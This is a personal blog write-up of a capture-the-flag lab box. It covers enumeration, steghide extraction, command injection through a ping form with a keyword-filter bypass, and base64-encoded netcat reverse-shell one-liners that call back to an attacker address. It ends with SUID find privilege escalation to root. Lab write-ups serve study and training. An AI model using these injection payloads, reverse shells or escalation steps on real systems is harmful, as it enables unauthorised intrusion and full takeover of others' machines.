Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

└─$ cat nmap.nmap
# Nmap 7.91 scan initiated Sun Jun 20 11:56:14 2021 as: nmap -sC -sV -oA nmap
Nmap scan report for
Host is up (0.33s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Service detection performed. Please report any incorrect results at .
# Nmap done at Sun Jun 20 11:57:26 2021 -- 1 IP address (1 host up) scanned in 71.42 seconds

Web Enumeration On Port 80

Since we have only Port 80 open we know our focus is only on HTTP enumeration now let try to access the IP on our browser to see what we have running between it running apache webserver.


Just a fake ping form so let try to brute force some directories with Gobuster .

└─$ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html,bak,sh,pl,cgi,zip
[+] Timeout:                 10s
2021/07/28 14:27:53 Starting gobuster in directory enumeration mode
/index.php            (Status: 200) [Size: 201]
/admin                (Status: 200) [Size: 417]

So we Navigate to that directory http://IP/admin a page with HacLabs directory of gallery.


Let try checking the source code.


Going through the source code we find the following comment at the last line: <!--passphrase:harder--> now what to do since we have some images let try using staghide on them all with the password.


Using steghide with the image haclabs.jpeg and the passphrase we discover a new directory superadmin.php

└─$ steghide info haclabs.jpeg
  format: jpeg
  capacity: 577.0 Byte
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "imp.txt":
    size: 21.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes


└─$ steghide extract -sf haclabs.jpeg                                                                                                                              1 ⨯
Enter passphrase: 
the file "imp.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "imp.txt".


Exploitation Command Injection On Ping Form

I was able to execute some command using | id but when i try getting a reverse shell i got nothing so i try reading the superadmin.php code. | cat superadmin.php


Source code Below;

   if (isset($_POST['submitt']))
   	$word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
   	$newStr = str_replace($word, "", $pinged);
   	if(strcmp($pinged, $newStr) == 0)

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";

We can some of the commands are blocked it keep getting fliter but seems we can bypass it.

Reverse Shell

nc.traditional -e /bin/bash IP Port


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP Port >/tmp/f

I will be trying the two payloads.


So we encode it to base64 also let start our ncat listener.

└─$ sudo nc -nvlp 443
[sudo] password for muzec: 
listening on [any] 443 ... | echo bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMjA5IDQ0Mw== | base64 -d | bash
└─$ sudo nc -nvlp 443
[sudo] password for muzec: 
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 57488
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have shell cool right now let try the second payload. |  echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC40OS4yMDkgODAgPi90bXAvZg== | base64 -d | bash


We have also shell with it now let spawn a TTY shell and root the box.

python3 -c 'import pty; pty.spawn ("/bin/bash")'

Privilege Escalation


sudo -l

We go nothing so let try checking for SUID permission with find / -perm -u=s -type f 2>/dev/null .

www-data@haclabs:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

We have find on SUID cool that our way to root.

/usr/bin/find . -exec /bin/sh -p \; -quit


We are root and done.

Greeting From Muzec

Back To Home